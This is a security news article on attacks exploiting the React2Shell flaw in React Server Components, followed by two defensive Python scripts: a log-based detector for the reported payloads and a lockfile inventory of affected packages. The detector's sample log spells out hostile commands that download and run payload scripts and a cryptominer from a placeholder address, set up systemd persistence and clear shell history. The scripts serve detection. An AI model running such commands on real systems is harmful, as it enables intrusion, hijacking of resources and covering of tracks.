React2Shell exploitation continues to escalate as threat actors take advantage of a maximum-severity flaw in React Server Components to deliver cryptocurrency miners and several newly observed malware families. Huntress research ties this surge in exploitation to CVE-2025-55182, a critical vulnerability that allows unauthenticated remote code execution on vulnerable systems. The company reported attempts against numerous organizations as of December 8, 2025, with the construction and entertainment sectors particularly affected. Among the malware deployed are PeerBlight, a Linux backdoor; CowTunnel, a reverse proxy tunnel; and ZinFoq, a Go-based post-exploitation implant. Huntress noted that the first exploitation attempts were detected on December 4, 2025, when an unidentified actor targeted a Windows endpoint by exploiting a vulnerable Next.js instance to deploy a shell script, a cryptocurrency miner, and a Linux backdoor. The discovery highlights the scale at which attackers are seeking to compromise both Linux and Windows systems without differentiating between operating environments.
Further observations revealed instances where actors executed discovery commands and attempted to pull several payloads from command-and-control infrastructure. Attackers also targeted Linux systems to deploy the XMRig cryptocurrency miner, relying on a publicly available GitHub tool to scan for vulnerable Next.js deployments before launching intrusion activity. Huntress researchers stated that identical patterns were seen repeatedly across impacted endpoints, including matching vulnerability probes and shell code tests. This suggests extensive use of automated exploitation tooling that executes payloads indiscriminately, even attempting to deploy Linux-specific tools onto Windows devices. The payloads observed included scripts such as sex.sh, which retrieves XMRig from GitHub, and d5.sh, a dropper responsible for launching the Sliver command-and-control framework, along with variants such as fn22.sh that incorporate self-updating mechanisms. Additionally, wocaosinm.sh, a variant of the Kaiji DDoS malware, added remote administration and persistence enhancements that further complicated the threat environment.
PeerBlight stands out for its capacity to maintain communication with a hard-coded command-and-control server and its use of multiple fallback channels. It installs persistence through a systemd service and adopts the appearance of a legitimate daemon process to evade detection. The backdoor integrates a domain generation algorithm and leverages the BitTorrent Distributed Hash Table network, registering nodes identifiable through a specific prefix to locate peers within the botnet. Huntress identified more than sixty nodes tied to this activity while noting that information sharing between nodes occurs only under strict conditions and with limited probability, to avoid generating detectable network patterns. ZinFoq exhibits similar sophistication, with capabilities for command execution, directory enumeration, file manipulation, payload retrieval, system data exfiltration, and proxy operations. To evade detection, ZinFoq removes bash history entries and disguises itself as one of several standard Linux services.
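The two preceding paragraphs list the observable traces a defender can hunt for: the named payload scripts (sex.sh, d5.sh, fn22.sh, wocaosinm.sh), XMRig downloads, a systemd unit dropped under a daemon-like name, and bash history being wiped. The following script is an added example, not Huntress's tooling or any code from the article, that runs those heuristics over process-audit log lines. The log format, the regexes, the 203.0.113.10 address and every sample line are constructed for illustration; only the script and miner names come from the article.

```python
import re
from dataclasses import dataclass

# Payload script names and the miner are the ones the article attributes to
# Huntress reporting; the regexes, log format and sample lines are constructed.
PAYLOAD_SCRIPTS = {"sex.sh", "d5.sh", "fn22.sh", "wocaosinm.sh"}
MINER_MARKERS = ("xmrig",)

TOKEN_RE = re.compile(r"[A-Za-z0-9_./:-]+")
UNIT_RE = re.compile(r"/etc/systemd/system/(?P<unit>[\w.-]+\.service)")
WRITE_RE = re.compile(r"\b(cp|mv|tee|cat|echo|printf)\b")
HISTORY_RE = re.compile(r"\bhistory\s+-c\b|\bunset\s+HISTFILE\b|\.bash_history\b")


@dataclass(frozen=True)
class Finding:
    line_no: int
    reason: str
    evidence: str


def inspect_line(line_no: int, line: str) -> list[Finding]:
    """Apply each heuristic to one command-audit log line."""
    findings = []
    lowered = line.lower()

    # 1. Known payload script referenced anywhere on the line (download or
    #    execution), matched on the basename of every path- or URL-like token.
    for tok in TOKEN_RE.findall(line):
        if tok.rsplit("/", 1)[-1] in PAYLOAD_SCRIPTS:
            findings.append(Finding(line_no, "known React2Shell payload script", tok))
            break

    # 2. XMRig miner fetched or run.
    if any(marker in lowered for marker in MINER_MARKERS):
        findings.append(Finding(line_no, "XMRig cryptominer reference", line.strip()))

    # 3. A systemd unit written by a shell command; PeerBlight persists this way
    #    under a daemon-like name, so such a unit deserves manual review.
    unit = UNIT_RE.search(line)
    if unit and WRITE_RE.search(line):
        findings.append(Finding(line_no, "systemd unit written from shell", unit.group("unit")))

    # 4. Shell-history tampering, as ZinFoq does to hide its activity.
    if HISTORY_RE.search(line):
        findings.append(Finding(line_no, "bash history cleared", line.strip()))

    return findings


def analyze(log_text: str) -> list[Finding]:
    """Run inspect_line over every line of a log and collect the findings."""
    findings = []
    for line_no, line in enumerate(log_text.splitlines(), start=1):
        findings.extend(inspect_line(line_no, line))
    return findings


# Constructed sample: one line per executed command, as a process-audit
# shipper might emit it. The host, user and address values are made up.
SAMPLE_LOG = """\
2025-12-04T10:12:01Z host=web01 user=node cmd="curl -fsSL http://203.0.113.10/sex.sh -o /tmp/sex.sh"
2025-12-04T10:12:02Z host=web01 user=node cmd="sh /tmp/sex.sh"
2025-12-04T10:12:05Z host=web01 user=node cmd="curl -s http://203.0.113.10/xmrig-linux.tar.gz -o /tmp/.x/m.tar.gz"
2025-12-04T10:12:09Z host=web01 user=node cmd="wget http://203.0.113.10/d5.sh -O /tmp/d5.sh"
2025-12-04T10:13:30Z host=web01 user=root cmd="cp /tmp/.cache/netd /etc/systemd/system/netd.service"
2025-12-04T10:13:31Z host=web01 user=root cmd="systemctl enable netd.service"
2025-12-04T10:14:00Z host=web01 user=root cmd="history -c"
2025-12-04T10:15:00Z host=web02 user=deploy cmd="npm ci --omit=dev"
"""

if __name__ == "__main__":
    for f in analyze(SAMPLE_LOG):
        print(f"line {f.line_no}: {f.reason} -> {f.evidence}")
```

Run against the sample, six of the eight lines are flagged; the `systemctl enable` and `npm ci` lines are not, because the heuristics key on file writes into `/etc/systemd/system/` and on the named scripts rather than on any service activity. The basename match is deliberate: it catches both the download and the later execution of a script regardless of where it was staged.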
Organizations using react-server-dom implementations (the webpack, parcel, and turbopack variants) have been strongly advised to update their systems without delay, given the ease with which this vulnerability can be exploited. Shadowserver data recorded more than 165,000 IP addresses and over 644,000 domains with exposed code as of December 8, 2025, with high concentrations in the United States, Germany, France, and India. Additional findings released on December 10, 2025 by Palo Alto Networks Unit 42 revealed activity overlapping with the Contagious Interview campaign deploying EtherRAT, along with the BPFDoor and Auto-Color malware families. Over fifty organizations across financial services, education, consulting, media, telecommunications, government, and multiple other sectors have been impacted, with wide geographic distribution across the United States, Asia, South America, and the Middle East. Analysts from firms including Wiz, Rapid7, and VulnCheck noted that exploitation is advancing across multiple attacker clusters, from opportunistic miners to highly capable groups folding the flaw into broader attack operations. They stressed the urgent need for patching and the importance of preparing for ongoing payload modifications as exploitation persists across the global threat landscape.
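The patch guidance above names the three react-server-dom packages but not the fixed version, so the first practical step is an inventory: which copies of those packages, including nested duplicates, does each application actually ship? The following script is an added example, not code from the article, React, or any of the vendors named. It walks the `packages` map of a `package-lock.json` (lockfileVersion 2 or 3) and compares each installed version against a fixed version the operator supplies from the React advisory; the `1.2.x` version numbers in the embedded sample lockfile are placeholders, not real React releases.

```python
import json

# Package names come from the article's patch guidance. The fixed version is
# NOT stated there, so the caller must supply it from the vendor advisory.
AFFECTED_PACKAGES = {
    "react-server-dom-webpack",
    "react-server-dom-parcel",
    "react-server-dom-turbopack",
}


def version_key(version: str):
    """Sortable key: numeric core, with a pre-release (e.g. 1.2.4-canary.7)
    ranking below its final release, as semver orders them."""
    core, _, prerelease = version.partition("-")
    core = core.split("+", 1)[0]  # drop build metadata
    parts = tuple(int(p) if p.isdigit() else 0 for p in core.split("."))
    return (parts, 0 if prerelease else 1)


def find_affected(lockfile: dict, fixed_version: str) -> list[dict]:
    """Report every install of an affected package found in the lockfile's
    'packages' map, nested copies under other dependencies included."""
    results = []
    for path, meta in lockfile.get("packages", {}).items():
        if not path:
            continue  # the "" key is the root project itself
        # Aliased installs carry an explicit name; otherwise derive it from the path.
        name = meta.get("name") or path.rsplit("node_modules/", 1)[-1]
        if name not in AFFECTED_PACKAGES:
            continue
        version = meta.get("version", "")
        results.append({
            "path": path,
            "name": name,
            "version": version,
            "needs_update": version_key(version) < version_key(fixed_version),
        })
    return sorted(results, key=lambda r: r["path"])


# Constructed lockfile with obviously made-up version numbers; the nested
# turbopack copy shows why the whole map, not just top level, must be walked.
SAMPLE_LOCK = {
    "name": "demo-app",
    "lockfileVersion": 3,
    "packages": {
        "": {"name": "demo-app"},
        "node_modules/next": {"version": "1.0.0"},
        "node_modules/react-server-dom-webpack": {"version": "1.2.3"},
        "node_modules/react-server-dom-parcel": {"version": "1.2.4-canary.7"},
        "node_modules/some-lib/node_modules/react-server-dom-turbopack": {"version": "1.2.4"},
    },
}
SAMPLE_FIXED_VERSION = "1.2.4"  # placeholder; substitute the version from the React advisory

if __name__ == "__main__":
    import sys
    # Usage: python inventory.py [path/to/package-lock.json] [fixed_version]
    lock = json.load(open(sys.argv[1])) if len(sys.argv) > 1 else SAMPLE_LOCK
    fixed = sys.argv[2] if len(sys.argv) > 2 else SAMPLE_FIXED_VERSION
    for r in find_affected(lock, fixed):
        flag = "UPDATE" if r["needs_update"] else "ok"
        print(f"{flag:6} {r['name']}@{r['version']} ({r['path']})")
```

Against the sample, the webpack copy and the canary build of the parcel package are flagged, while the nested turbopack copy at the placeholder fixed version is reported as up to date. Pre-release handling matters here because Next.js applications frequently pin canary builds of these packages, and a canary tagged with the fixed version number still predates the release that carries the fix.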